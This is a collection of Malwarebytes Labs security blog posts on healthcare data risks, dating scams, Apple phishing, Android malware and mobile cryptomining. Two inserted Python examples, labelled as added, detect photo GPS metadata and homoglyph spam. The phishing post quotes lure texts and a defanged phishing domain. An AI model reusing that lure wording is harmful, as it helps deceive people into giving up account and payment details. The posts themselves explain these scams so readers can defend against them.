Feb 15, 2018
John

Physician, protect thyself: healthcare cybersecurity circling the drain

No one knows you better than you do. But thanks to technology advances and the continued digitization of healthcare data accumulation and sharing processes, we can also honestly say the same about your healthcare provider.

Indeed, every time we get in touch with a health professional, data is recorded (either on paper or electronically), entered into a computer, and then stored in a massive database for record-keeping, analysis, and retrieval.

This digital warehouse of electronic health records (EHR), which contain medical history, diagnoses, and medications (including billing data, insurance, and other personally identifiable information), is what cybercriminals are after. For healthcare facilities in the business of research, intellectual property is their primary asset at risk. Such a trove in the wrong hands could mean nothing good.

A horripilation of dread

Dismally, where healthcare excels in medical breakthroughs and advances in therapy, it lacks in cybersecurity preparedness and adoption of privacy practices. Studies from independent organizations consistently reveal that the continuous use of legacy systems—those outdated programs and computers running Windows XP—scarce resources allocated for cybersecurity, and an apparent shortage of IT professionals top the list of problems the healthcare industry faces. And this is just the tip of the iceberg.

Technological advancements that make reviewing, sharing, and storing digital information possible present other significant challenges that need addressing. They include:

  • The easy accessibility of patient records
  • The automation of clinical systems (e.g. the ordering of prescription medicine for patients)
  • The introduction of external media or third-party devices to the hospital network
  • The emergence of mobile health apps
  • The increasing adoption of BYOD
  • The overall lack of awareness of risks to patient health data among hospital and clinic staff

Below, we take a look at the cybersecurity risks that each of these challenges present.

Easy accessibility of patient records

Public-facing healthcare facilities like hospitals and clinics have embraced the move from paper records to digital records. In so doing, they gather and store patient data into databases open to anyone with access to them, whether it be a doctor 20 miles from the building or a nurse at the reception desk.

The digitization of patient health records also made the process of sharing information across multiple healthcare facilities easier. Patients, too, are given access to their health records. Because of this, the likelihood of exposure to threats increases.

All that storing, retrieving, and sharing leaves the door open to malicious actors who can just as easily infiltrate the database to steal information and sell it on the black market. How valuable is patient data? Very valuable. Medicare ID numbers belonging to 10 patients, for example, are being sold for 22 Bitcoins, which amounts to more than $200,000 as of this writing. EHRs carry a hefty price tag because this is the kind of data that criminals can use and reuse for decades. And unlike credit card data, medical records cannot be altered or canceled once used in fraud.


Read: Think tank summarizes what happens to healthcare records after breach


Automation of hospital and clinic systems

Removing redundant and tedious tasks from healthcare professionals’ workday is a sound business move. It increases productivity, saves money, and improves the patient experience. However, as much good as automation has brought the industry, the implementation of its systems may have been carried out without cybersecurity or privacy in mind.

Those who quickly went about deploying automation for services like refilling prescriptions or making appointments might have medical devices and web-facing computers in the same network when they should be separate, for example. When medical devices are networked on the Internet and not secured, that leaves the door open for threat actors to exploit.

External media or third-party devices

Although the use of unencrypted external media and portable devices is against HIPAA (Health Insurance Portability and Accountability Act of 1996) standards, staff and third-party contractors continue to introduce such devices to computer systems connected to the hospital network. There have also been instances where patients have brought their medical records in via external media for doctors to review.

Two possible ends could come from this: portable media and devices might get stolen or misplaced, resulting in a security breach, and/or malware might be introduced to the network. Ideally, both ends should be avoided at all costs.

Mobile health apps

We’re talking about mobile health, or mHealth, apps used by patients and medical professionals alike. These apps collect data from whoever uses them, and if doctors have access to this data, they can readily provide feedback or advice. Unfortunately, there is no such thing as a “one app that rules them all.” There are thousands of them out there in the market, believe it or not. And each one of them needs to be secured, or all that data risks being leaked.

Bring Your Own Device (BYOD)

In 2012, Aruba Networks published the results of their survey, revealing that 85 percent of healthcare staff and professionals support the use of personal mobile devices, such as smartphones, laptops, and tablets, at work. Some say this trend is a natural fit for the industry as doctors and nurses are frequently on the move.

Being able to access records on the fly and sharing them with colleagues increases collaboration and productivity among healthcare staff. However, mobile devices owned by hospital staff and professionals are liable to theft. If they are not encrypted, it’s easy enough for the thief to retrieve, make use of, or sell the EHR stored in them.

Some hospitals and clinics also allow patients and visitors to connect to the facility’s Internet. This results in both patient and staff member BYOD devices overwhelming the bandwidth. On top of this, no one is really sure if such devices are secure enough, if at all. If a potentially infected device is introduced to the network, malware could take residence in the server or spread to other devices connected to the network.


Read: BYOD, why don’t you?


Lack of cybersecurity awareness

Lastly, healthcare staff are generally unaware of threats to patient data and poorly prepared to identify attack types. This is probably why they may appear negligent in handling email, mobile devices, and hospital records. As we have already established, cybersecurity issues are not just something that IT staff should scramble to address. Everyone, including nurses and doctors, has a responsibility to uphold when it comes to protecting patient data and securing hospital resources from external threats.

Sadly, there’s no panacea in sight

Unfortunately, there’s no magic bullet to address the myriad of challenges born from an environment this complex. In fact, addressing problems and risks surrounding something this important shouldn’t be rushed. People’s lives, after all, are at stake here, too. Although an overhaul may be needed to completely turn things around for the healthcare industry, this still takes a considerable amount of time to implement. And even if it has been completed, continuous improvement must naturally follow.

The good news is that healthcare facilities, regardless of size, don’t have to wait for a major revamp to happen before they can address the current dilemmas plaguing their industry. In part 2 of this post, we’ll discuss steps healthcare organizations can take to stay secure—beginning with awareness and education campaigns.

Until then, be well and stay safe!

The post Physician, protect thyself: healthcare cybersecurity circling the drain appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 14, 2018
John

Online security tips for Valentine’s Day: how to beat the cheats

Valentine’s Day is upon us once more, and so are lots of dating-friendly security tips. Read on and secure your profile, alongside (one hopes) the love of your life.

1. Not so hot singles in your area

Many dating apps have geotagging enabled, regardless of whether you created your profile on a website or through the app itself. Some dating sites use the location you initially enter to serve up a list of possible matches within a certain radius, but they don’t display the location info on your profile.

Get familiar with the granular controls on the dating site’s settings and make sure you understand the differences. Many mobile apps aren’t hugely clear about which thing does what, so if in doubt, disable a particular feature until you can be 100 percent sure. As a side note, ensure you don’t have geotagging enabled on any photographs you upload. If in doubt, use a picture from a public location away from your main residence. You can also use online tools to check what EXIF information is stored in images you want to use and remove it if needed.
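Checking a photo for location metadata doesn’t require an online tool. The following is an added example, not code from the post: it walks the JPEG marker segments, reads the EXIF GPS IFD with nothing but the standard library, and strips the EXIF segment. The JPEG it runs on is constructed inline by build_sample_jpeg() (no picture data, made-up coordinates), so it runs offline.

```python
"""Read GPS tags from a JPEG's EXIF block and strip the block (stdlib only).

Added example, not from the Malwarebytes post; build_sample_jpeg() constructs
the input (SOI + APP1 Exif + EOI, no picture data) with made-up coordinates."""
import struct

EOI, APP1, SOS = 0xD9, 0xE1, 0xDA
TAG_GPS_IFD = 0x8825                        # IFD0 entry pointing at the GPS sub-IFD
GPS_TAGS = {0x0001: "GPSLatitudeRef", 0x0002: "GPSLatitude",
            0x0003: "GPSLongitudeRef", 0x0004: "GPSLongitude"}


def iter_segments(jpeg):
    """Yield (marker, start, end, payload) for each marker segment before SOS/EOI."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 4 <= len(jpeg):
        marker = jpeg[pos + 1]
        if jpeg[pos] != 0xFF or marker in (EOI, SOS):   # corrupt, or scan data begins
            return
        end = pos + 2 + struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        yield marker, pos, end, jpeg[pos + 4:end]
        pos = end


def _read_ifd(tiff, offset, order):
    """Return {tag: (type, count, 4-byte value field)} for the IFD at offset."""
    n = struct.unpack(order + "H", tiff[offset:offset + 2])[0]
    entries = {}
    for i in range(n):
        e = offset + 2 + 12 * i
        tag, typ, count = struct.unpack(order + "HHI", tiff[e:e + 8])
        entries[tag] = (typ, count, tiff[e + 8:e + 12])
    return entries


def _value(tiff, typ, count, raw, order):
    """Decode ASCII (type 2) or RATIONAL (type 5); inline if it fits in 4 bytes, else at an offset."""
    size = {2: 1, 5: 8}[typ] * count
    off = struct.unpack(order + "I", raw)[0] if size > 4 else None
    data = raw[:size] if off is None else tiff[off:off + size]
    if typ == 2:                            # ASCII, NUL terminated
        return data.rstrip(b"\0").decode("ascii")
    nums = struct.unpack(order + "%dI" % (2 * count), data)   # (numerator, denominator) pairs
    return [nums[i] / nums[i + 1] for i in range(0, len(nums), 2)]


def exif_gps(jpeg):
    """Return {'latitude': deg, 'longitude': deg} if the EXIF GPS IFD carries them, else None."""
    for marker, _, _, payload in iter_segments(jpeg):
        if marker != APP1 or not payload.startswith(b"Exif\0\0"):
            continue
        tiff = payload[6:]
        order = "<" if tiff[:2] == b"II" else ">"      # TIFF byte order
        ifd0 = _read_ifd(tiff, struct.unpack(order + "I", tiff[4:8])[0], order)
        if TAG_GPS_IFD not in ifd0:
            return None
        gps_off = struct.unpack(order + "I", ifd0[TAG_GPS_IFD][2])[0]
        gps = {GPS_TAGS[t]: _value(tiff, typ, cnt, raw, order)
               for t, (typ, cnt, raw) in _read_ifd(tiff, gps_off, order).items()
               if t in GPS_TAGS}
        if "GPSLatitude" not in gps or "GPSLongitude" not in gps:
            return None
        deg = lambda dms: dms[0] + dms[1] / 60 + dms[2] / 3600   # D/M/S -> decimal degrees
        lat, lon = deg(gps["GPSLatitude"]), deg(gps["GPSLongitude"])
        return {"latitude": -lat if gps.get("GPSLatitudeRef") == "S" else lat,
                "longitude": -lon if gps.get("GPSLongitudeRef") == "W" else lon}
    return None


def strip_exif(jpeg):
    """Return a copy of the JPEG with every APP1 Exif segment removed."""
    out, tail = bytearray(jpeg[:2]), 2
    for marker, start, end, payload in iter_segments(jpeg):
        if not (marker == APP1 and payload.startswith(b"Exif\0\0")):
            out += jpeg[start:end]          # keep JFIF, quantisation tables, etc.
        tail = end
    return bytes(out + jpeg[tail:])         # SOS, scan data and EOI pass through


def build_sample_jpeg(lat_dms, lat_ref, lon_dms, lon_ref):
    """Constructed test input: a minimal little-endian JPEG/EXIF carrying only a GPS IFD."""
    ifd0_off, gps_off, lat_off, lon_off = 8, 26, 80, 104     # fixed TIFF layout
    tiff = b"II" + struct.pack("<HI", 42, ifd0_off)           # TIFF header
    tiff += struct.pack("<H", 1)                              # IFD0: one entry
    tiff += struct.pack("<HHII", TAG_GPS_IFD, 4, 1, gps_off)  # LONG pointer to GPS IFD
    tiff += struct.pack("<I", 0)                              # no next IFD
    tiff += struct.pack("<H", 4)                              # GPS IFD: four entries
    tiff += struct.pack("<HHI", 0x0001, 2, 2) + lat_ref.encode() + b"\0\0\0"
    tiff += struct.pack("<HHII", 0x0002, 5, 3, lat_off)
    tiff += struct.pack("<HHI", 0x0003, 2, 2) + lon_ref.encode() + b"\0\0\0"
    tiff += struct.pack("<HHII", 0x0004, 5, 3, lon_off)
    tiff += struct.pack("<I", 0)
    assert len(tiff) == lat_off, "layout offsets out of step"
    for d, m, s in (lat_dms, lon_dms):                        # three RATIONALs each
        tiff += struct.pack("<6I", d, 1, m, 1, s, 1)
    app1 = b"Exif\0\0" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"
```

Run exif_gps() on a file’s bytes before uploading it; if it returns coordinates, write out strip_exif() of the same bytes instead.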

You’ll find some additional practical advice in terms of real-world security on the Selfie Security blog we posted a while back. You should pay particular attention to not including location-specific items in your photograph(s), such as bills with your address on them. Of course, if you want to enable geotagging then go ahead—just be mindful of the issues that could arise. The easier you are to find, the easier it is for that one terrible date you had to hang around your home, workplace, or just generally trail around familiar locations and become a major nuisance. We see many cases of stalking due to jilted hangers-on from dating apps—don’t fall into this trap.

If stalking does happen to you, go to your local police department and let them know what’s happening. Depending on how much information the other person has, it may already be too late to go on blackout, but you can at least let those in authority know that somebody is pestering you.

2. Money thieves in your area

Scammers setting up fake profiles then asking for money is astonishingly common, and it’s all too easy to be taken to the cleaners as a result. Just like 419 scams, romance fakers often use templates—or just lazily cut and paste bot spam to reuse for their own purposes—and fans of dating sites should get into the habit of Googling common phrases, just to see if someone else is saying the same thing. If Steven J. Fakename is posting identical romantic overtures on six different sites, you can be sure it’s time to move along.

With regard to common scam angles, watch out for anything related to:

  • Sick relatives
  • Medical emergencies
  • Lost overseas and need a plane ticket
  • Lost passport and need a visa/replacement passport
  • Wallet stolen and no funds available
  • Coming to visit, but there’s a last minute ticket price hike and I need your help

On a related note, don’t ever let strangers send money to your bank account for any reason. They’ll probably get you to forward the cash on to someone else, and at that point, you’ve become a money mule.

That’s a criminal offence, and you really don’t want to be committing one of those.

3. My other profile is also in your area

Be cautious around links sent your way that direct you to another website, and be particularly careful around links to downloadable files. Scammers will often try and remove you from the relative safety of the service you happen to be using, directing you to links and files that the dating site you started with can’t hope to contain. That’s been a staple attack on social media sites for many a year, but it works with dating too.

If someone sends you shortened URLs, you can usually expand them to see where they end up. If you’re still not sure, try googling the link. If still nothing comes up to allow you to make an informed decision, you should just ignore whatever you’ve been sent—it isn’t worth the risk. You’ll probably want to block and report the sender while you’re at it.

4. Personal information in your area

Don’t put your real name, age, or location in your profile, email, or anything else related to the dating site you’re on. Anonymous usernames are fine. You should also use a disposable email address when you sign up to a new dating service—not only will this keep people you’d rather not stay in touch with away from your main mailbox, it’ll also be obvious if a dating site decides to sell your email to spammers. This is a good trick to use outside of online dating, too. Of course, the less personal information you put on a dating profile, the more likely it is that potential suitors may simply move on. As with everything, the decision is yours.

5. Bots in your area

If you have an open private message system, you’ll likely receive many, many messages from people wanting to chat. Some dating websites will also send multiple daily messages to users via email claiming that persons x, y, and z would like to talk to you. They may even ask about cookie dough (and it better be delicious considering the eventual $118.76 monthly fee). Most dating bots will cycle through a canned script of a dozen or so phrases before claiming you need to be “verified” in some way. This will inevitably lead to a request for payment information.

Don’t do it. If in doubt, contact the service you’re using and ask them about it directly. You’ve probably seen examples of this on blogs about Skype spam.

Bots will advertise everything from pornography to mobile games, and spammers commonly use images ripped from the net for their profile avatars. You can try and see if the picture is a stock photo by using the “Search Google for this image” option in your browser, or fire up TinEye to see what’s out there.

Bot accounts probably won’t have a realistic-looking bio, or links to profiles on popular social networks. If it looks cookie-cutter, there’s a good chance it is. Feel free to see if they pop up across the web anyway and you’ll quickly learn if they’re one of a kind or part of a wave of identikit bots. The bottom line is that nobody is going to start sending you random messages that you’re their hero and can we get married in 10 minutes please, so approach any and all conversations with a healthy dose of skepticism from the outset.

6. Dubious pics in your area

Be wary of people asking for intimate photographs and/or video, as this is a surefire way to find yourself blackmailed into handing over lots of money. If you do pay the blackmailer, there’s no guarantee the images won’t be leaked anyway. There’s also the issue of revenge porn to consider, and the legal issues that will inevitably arise as a result.

Put simply: don’t do it. Again.

Even with these precautions in place, problematic pieces of tech, such as the recent Deepfakes furore, ensure that anyone placing even a few dozen images or videos online could end up in a (fake) pornographic movie. Given that people tend to place many, many photos of themselves in their best light on dating pages, along with the occasional movie clip, it might be an idea to at least roll back the volume of photos you have of yourself online.

Hopefully, the above will help to keep you out of trouble while swiping left, right, up, and quite possibly down. Here’s to a safe online Valentine’s Day experience for everybody.

The post Online security tips for Valentine’s Day: how to beat the cheats appeared first on Malwarebytes Labs.


Feb 13, 2018
John

Panic attack: Apple scams apply pressure

We’ve seen a number of Apple-related phishes in circulation over the last few days. While most of them already lead to deactivated phishing sites, we thought it was worth highlighting some of the tricks being used to bait people into handing over payment details at the moment.

Fake receipt emails

First up, a number of fake “receipt” emails ranging in date from February 2–6. While the content of some of the emails varies slightly, most of them use a subject line similar to the below:

[ New Statement ] Your receipt from Apple [ 02 February 2018 ]

In the cases we’ve seen, the mails claim to be receipts for a payment of $9.99 made out to, er, Mr. Edward Snowden. Apparently, privacy campaigns and 2 terabyte storage plans go together nicely.

[Image: fake Apple cloud purchase receipt]

The general rule of thumb is to try and be as inconspicuous as possible, so we’re not really sure why the scammers went with one of the most well-known privacy advocates on the planet to fill in the personal information box. Not only that, but they used a randomly-grabbed address from a property website sporting nine bedrooms and four bathrooms.

Maybe the plan is to hit the potential victim with something so utterly ludicrous, that they’ve already clicked the link before they’ve had time to think about it. For a lot of people, simply seeing a “Thanks for the order of this thing that costs you money” would be enough to have panic set in.

The good news for potential clickers is, the site the scammers are trying to bounce through is already wise to the scam and has effectively killed the one-way street to the phish page.

[Image: the redirect link is down]

The phish link itself is also offline, so we can’t show you what may lie in wait. But we can confirm people won’t be losing money to this one anytime soon.

Someone else logged in

Elsewhere, we have a “Reminder” notification that someone else is logging in on your Apple account with an iPod in Monaco.

[Image: iPod login notification email]

The email reads as follows:

[Reminder] [Notification Update] Statement new log-in your Apple account with other device

Fοuг уοuг ѕаfеtу, уοuг Αррlе ID hаѕ Ьееn lοсκеd Ьесаuѕе wе fοund ѕοmе ѕuѕрісіοuѕ асtіνіtу οn уοuг ассοunt. Ѕοmеοnе ассеѕѕіng уοuг ассοunt аnd mаκе ѕοmе сhаngе οn уοuг ассοunt іnfοгmаtіοn. This the details :
Country : Monaco
IP Address :
Date and Time : 13:09, 06 Feb 2018
OS : iPod
Browser : Safari

If you did not make these action or you believe an unauthorized person has accessed your account, you should login to your account as soon as possible to verify your information.

Apart from the lazy typos (“Four your safety”) and awful sentence structure, they also make use of some Cyrillic characters in a likely attempt to bypass Bayesian filtering. While the destination site was offline again, it’s worth noting that all of the examples tried to send potential victims to HTTPS websites, instead of the plain old HTTP landing page. All phishers now want to look as “secure” as they possibly can—anything to help pull the wool over your eyes.

Always worth repeating: just because a website is HTTPS does not mean it is a legitimate website. Phish pages can lurk anywhere, no matter what security the page you’re on happens to be touting.
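The mixed-script trick described above can be detected mechanically rather than by eye: a mail filter can count how many letters fall outside the script the message is supposedly written in, and fold the look-alikes back to Latin so ordinary keyword rules still match. This is an added example, not from the post; SAMPLE is a reconstruction of the quoted phishing text with explicit Cyrillic and Greek code points, and FOLD is a constructed subset of Unicode’s confusable characters.

```python
"""Detect Latin-look-alike letters from other scripts in e-mail text.

Added example, not from the Malwarebytes post. SAMPLE reconstructs the
phishing text quoted in the post with explicit code points; FOLD is a
constructed subset of Unicode's confusable characters.
"""
import unicodedata

# Constructed sample: "Four your safety, your Apple ID has been locked ..."
# typed with Cyrillic (U+04xx) and Greek (U+03xx) look-alike letters.
SAMPLE = (
    "F\u03bfu\u0433 \u0443\u03bfu\u0433 \u0455\u0430f\u0435t\u0443, "
    "\u0443\u03bfu\u0433 \u0391\u0440\u0440l\u0435 ID h\u0430\u0455 "
    "\u042c\u0435\u0435n l\u03bf\u0441\u03ba\u0435d "
    "\u042c\u0435\u0441\u0430u\u0455\u0435 w\u0435 f\u03bfund "
    "\u0455\u03bfm\u0435 \u0455u\u0455\u0440\u0456\u0441\u0456\u03bfu\u0455 "
    "\u0430\u0441t\u0456\u03bd\u0456t\u0443 \u03bfn \u0443\u03bfu\u0433 "
    "\u0430\u0441\u0441\u03bfunt."
)

# Constructed table: look-alike letter -> the Latin letter it imitates.
FOLD = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0455": "s", "\u0433": "r",
    "\u042c": "b", "\u0405": "S", "\u0391": "A", "\u0395": "E", "\u039f": "O",
    "\u03bf": "o", "\u03ba": "k", "\u03bd": "v",
}


def script_of(ch):
    """Script family of a letter ('LATIN', 'CYRILLIC', 'GREEK', ...), or None for non-letters."""
    if not ch.isalpha():
        return None
    try:
        return unicodedata.name(ch).split()[0]
    except ValueError:                  # unnamed code point
        return "UNKNOWN"


def suspicious_words(text, expected="LATIN"):
    """Words containing at least one letter outside the expected script."""
    return [w for w in text.split()
            if any(s not in (None, expected) for s in map(script_of, w))]


def foreign_letter_ratio(text, expected="LATIN"):
    """Fraction of letters that are not in the expected script (0.0 for clean text)."""
    scripts = [s for s in map(script_of, text) if s]
    return sum(s != expected for s in scripts) / len(scripts) if scripts else 0.0


def fold_homoglyphs(text):
    """Map known look-alikes back to Latin so ordinary keyword rules match the text."""
    return "".join(FOLD.get(ch, ch) for ch in text)


def classify(text, threshold=0.05):
    """'homoglyph' when more than `threshold` of the letters come from another script."""
    return "homoglyph" if foreign_letter_ratio(text) > threshold else "clean"


if __name__ == "__main__":
    print("foreign letter ratio: %.2f" % foreign_letter_ratio(SAMPLE))
    print("flagged words:", suspicious_words(SAMPLE))
    print("folded:", fold_homoglyphs(SAMPLE))
```

The threshold is deliberately low: a genuine English mail with a single Cyrillic name still scores well under 5 percent, while the sample above has two thirds of its letters outside Latin.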

Apple care scare

There are also some dubious texts going around claiming to be from Apple Care:

[Image: “Final Notification” text message]

It reads as follows:

Final Notification

Your Apple ID is due to expire today. Prevent this by confirming your Apple ID at

appleid-revise(dot)com

Apple Inc

As you can see, there’s a big push to apply pressure to potential victims, and everything falls somewhere between the two extremes of “Payment made, quick do something!” and “So, your account is going to be terminated.” While we’re happy to say this is another one that came to our attention already DOA, even as texts were going out, the sad truth is that for every site taken down there are many more happily accepting credit card details and personal information.

Fake app purchases

We’ve also seen some fake app purchases, and this one rather spookily has an order number attached that was actually of some relevance to the recipient.

Be aware of Apple Phishing email! (See pic) I checked my payment source, & called Apple. They DO NOT have a link in the receipt emails. The order ID was a valid one from a purchase 2 months ago. (Not this purchase) #TeamEmmmmsie #TUGfam #MGC #AppleSupport pic.twitter.com/SZYY2YxS0q

— Rick92647 [TeEm] [TugFam] [MGC] (@Rick92647) February 5, 2018

While one hopes this is just some horrible coincidence, it could just as easily have prompted the above individual to start visiting rogue links—and that’s all it really takes. Just one fragment of information from an otherwise garbled email missive could be enough to cost someone a small fortune—or even worse, a very large one.

If you’re worried about the pushy tone of a supposed Apple missive, contact them directly to check its validity, and wander over to their help page for more information on securing your Apple account. These are some of the most common scams around, and for as long as Apple IDs are tied to valuable purchases and personal information, criminals will continue to target these accounts.

The post Panic attack: Apple scams apply pressure appeared first on Malwarebytes Labs.


Feb 13, 2018
John

Kotlin-based malicious apps penetrate Google market

An open-source programming language, Kotlin is a fully supported official programming language for Android. Google boasts that Kotlin contains safety features in order to make apps “healthy by default.” Many apps are already built with Kotlin, from the hottest startups to Fortune 500 companies (Twitter, Uber, and Pinterest, for example).

Concise while being expressive, Kotlin reduces the amount of boilerplate code needed to create an app—which makes it much safer. However, as revealed by Trend Micro researchers, the first samples of Android malware created using Kotlin were found on Google Play. Introducing: Swift Cleaner, a utility tool built with Kotlin that claims to clean and optimize Android devices.

This malicious app is capable of remote command execution, can steal personal information, carry out click fraud, and sign users up to premium SMS subscription services without their permission. So much for safe.

Analyze this

After Swift Cleaner is launched, the first thing the malware does is call PspManager.initSDK, check the phone number, and send an SMS message to the particular number given by the C&C server. The app does this to check for the presence of a SIM card and whether mobile carrier services are available.

Upon server interaction, the malicious part of the app launches URL forwarding and click fraud activities. Click fraud is an illegal practice that occurs when individuals click on a website’s advertisements (either banner ads or paid text links) to increase the payable number of clicks to the advertiser. In our case, the app clicks on a URL, which leads you to a survey. At the end of the survey, you are given an opportunity to get some free services if you click on the claim link. By clicking the button, you will then be redirected to another possibly malicious website.

Meanwhile, Swift Cleaner collects personal information from the infected mobile device, such as the International Mobile Equipment Identity (IMEI), International Mobile Subscriber Identity (IMSI), and information about the SIM card. The stolen information is then encrypted and sent to the remote Command and Control (C&C) server.

There are services that run in the background in order to communicate with a C&C server. Swift Cleaner compromises one of these services: the Wireless Application Protocol (WAP). WAP is a technical standard for accessing information over a mobile wireless network.

The app is using WAP in conjunction with JavaScript in order to bolt on CAPTCHA bypass functionality, using mobile data and analyzing the image base64 code. CAPTCHA images are parsed and cracked, and the image data will later be uploaded to the C&C server. This data is needed to train the neural network. Later on, all the image samples will be useful for finding the best match for each character of the new upcoming CAPTCHA.

Premium SMS service

The Swift Cleaner malware also uploads information about the user’s service provider along with login information and similar sensitive data to the C&C server. This can automatically sign users up for a premium SMS service, which will cost money.

Premium rate SMS is a form of mobile billing where the user pays for a premium service by either receiving or sending a message. There are two ways this billing service works:

  1. Mobile Originated (MO): where the mobile user pays to send a message (used for once-off services, such as competitions)
  2. Mobile Terminated (MT): where the mobile user pays to receive a message (used for subscription services)

Our example app uses the premium SMS MO service, and redirects users to webpages where they can select to send a message.

Neverending story

As of now, Google has removed the fake Swift Cleaner apps carrying this new malware from the Play Store. However, even if Google states that their protection is on a high level, there appears to be no fail-proof way to stop malware from entering the Play Store. By using a quality mobile anti-malware scanner as a second layer of protection, you can stay safe even when Google Play Protect fails. We (as always) recommend Malwarebytes for Android. Stay safe out there!

The post Kotlin-based malicious apps penetrate Google market appeared first on Malwarebytes Labs.


Feb 12, 2018
John

A week in security (February 5 – February 11)

Last week on Malwarebytes Labs, we featured a new Flash Player zero-day that has been found in recent targeted attacks. And we talked about a new trick to cripple browsers that came out of the hat of tech support scammers.

We also covered several methods of stealing cryptocurrencies, including one for the Mac that wasn’t as new as it seemed, one for Android that poses as hack apps, and yet another abusing the fact that Deepfakes content was banned from most major networks. We even threw in an overview of several major cryptocurrency related thefts.

For Safer Internet Day 2018, we provided you with some fast and free tools to make your Internet experience safer and more private using ad blockers and anti-trackers.

Other news

  • Security researcher Scott Helme reported that thousands of US and UK government sites were running a compromised BrowserAloud plugin, making visitors mine for the Monero cryptocurrency. (Source: Sky News)
  • Lenovo warned customers about two critical Broadcom (Wifi) vulnerabilities that impact 25 models of its popular ThinkPad brand. (Source: ThreatPost)
  • Research shows that LiteCoin will be the next dominating cryptocurrency on the Dark Web, and not Monero as expected. (Source: Recorded Future)
  • A free decryption tool was released for Cryakl ransomware by Belgian Federal Police together with Kaspersky Lab. (Source: Bleeping Computer)
  • The Russian Research Institute of Experimental Physics was found to be using their nuclear supercomputer for cryptomining. (Source: Naked Security)
  • Researchers have identified a new strain of point-of-sale (PoS) malware that impersonates a LogMeIn service pack to steal credit card data via a DNS server. (Source: Tripwire)
  • The US Justice Department announced charges on Wednesday against three dozen individuals thought to be key members of “Infraud,” a long-running cybercrime forum that federal prosecutors say cost consumers more than half a billion dollars. (Source: Krebs on Security)
  • Working with Fujitsu, Microsoft is further embracing biometric technology with the implementation of a palm-vein authentication system that will be supported by Windows 10 Pro. (Source: CBR online)
  • Key iPhone source code gets posted online that could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve. (Source: Motherboard)
  • VMware has advised on how to mitigate the Meltdown and Spectre chip design flaws in several of its products. (Source: The Register)

Stay safe, everyone!

The post A week in security (February 5 – February 11) appeared first on Malwarebytes Labs.


Feb 12, 2018
John

Drive-by cryptomining campaign targets millions of Android users

Malvertising and online fraud through forced redirects and Trojanized apps—to cite the two most common examples—are increasingly plaguing Android users. In many cases, this is made worse by the fact that people often don’t use web filtering or security applications on their mobile devices.

A particular group is seizing this opportunity to deliver one of the most lucrative payloads at the moment: drive-by cryptomining for the Monero (XMR) currency. In a campaign we first observed in late January, but which appears to have started at least around November 2017, millions of mobile users (we believe Android devices are targeted) have been redirected to a specifically designed page performing in-browser cryptomining.

In our previous research on drive-by mining, we defined this technique as automated, without user consent, and mostly silent (apart from the noise coming out of the victim’s computer fan when their CPU is clocked at 100 percent). Here, however, visitors are presented with a CAPTCHA to solve in order to prove that they aren’t bots, but rather real humans.

“Your device is showing suspicious surfing behaviour. Please prove that you are human by solving the captcha.”

Until the code (w3FaSO5R) is entered and you press the Continue button, your phone or tablet will be mining Monero at full speed, maxing out the device’s processor.

Redirection mechanism

The discovery came while we were investigating a separate malware campaign dubbed EITest in late January. We were testing various malvertising chains that often lead to tech support scams with an Internet Explorer or Chrome user-agent on Windows. However, when we switched to an Android, we were redirected via a series of hops to that cryptomining page.

It seems odd that a static code (which is also hardcoded in the page’s source) would efficiently validate traffic between human and bot. Similarly, upon clicking the Continue button, users are redirected to the Google home page, another odd choice for having proved you were not a robot.

While Android users may be redirected from regular browsing, we believe that infected apps containing ad modules are loading similar chains leading to this cryptomining page. This is unfortunately common in the Android ecosystem, especially with so-called “free” apps.

It’s possible that this particular campaign is going after low quality traffic—but not necessarily bots —and rather than serving typical ads that might be wasted, they chose to make a profit using a browser-based Monero miner.

We identified several identical domains all using the same CAPTCHA code, and yet having different Coinhive site keys (see our indicators of compromise for the full details). The first one was registered in late November 2017, and new domains have been created since then, always with the same template.

[Table: domain name and registration date for each identified domain]

Traffic stats

We believe there are several more domains than just the few that we caught, but even this small subset is enough to give us an idea of the scope behind this campaign. We shared two of the most active sites with ad fraud researcher Dr. Augustine Fou, who ran some stats via the SimilarWeb web analytics service. This confirmed our suspicions that the majority of traffic came via mobile and spiked in January.

We estimate that the combined traffic from the five domains we identified so far amounts to about 800,000 visits per day, with an average of four minutes spent on the mining page. To estimate the number of hashes produced, we can take a conservative hash rate of 10 h/s, based on a benchmark of ARM processors.

It is difficult to determine how much Monero currency this operation is currently yielding without knowing how many other domains (and therefore total traffic) are out there. Because of the low hash rate and the limited time spent mining, we estimate this scheme is probably only netting a few thousand dollars each month. However, as cryptocurrencies continue to gain value, this amount could easily be multiplied a few times over.

Conclusion

The threat landscape has changed dramatically over the past few months, with many actors jumping on the cryptocurrency bandwagon. Malware-based miners, as well as their web-based counterparts, are booming and offering online criminals new revenue sources.

Forced cryptomining is now also affecting mobile phones and tablets en masse—not only via Trojanized apps, but also via redirects and pop-unders. While these platforms are less powerful than their desktop counterparts, there is also a greater number of them out there. Similar to what we see with IoT devices, it’s not always the individual specifications, but rather the power of the collective group altogether that matters.

We strongly advise users to run the same security tools they have on their PC on their mobile devices, because unwanted cryptomining is not only a nuisance but can also cause permanent damage.

Malwarebytes mobile users are protected against this threat.

Indicators of compromise

Domains:


Referring websites (please note that they should not be necessarily considered malicious):


Coinhive site keys:


The post Drive-by cryptomining campaign targets millions of Android users appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 9, 2018
John
Comments Off on Bank robbers 2.0: digital thievery and stolen cryptocoins

Bank robbers 2.0: digital thievery and stolen cryptocoins

Imagine running down the street (and away from law enforcement) with 2,000 pounds of gold bars. Or 1,450 pounds in $100 bills. With both of these physical currencies amounting to roughly US$64 million, you’d be making quite a steal…if you could get away with it.

That’s exactly what the next generation of thieves—bank robbers 2.0—did in December 2017, when they stole more than $60 million in Bitcoin* from the mining marketplace NiceHash. It turns out stealing Bitcoin is a lot less taxing on the body.

*Disclaimer: I used the value of Bitcoins as they were at the time of the robbery. Current values are volatile and change from minute to minute.

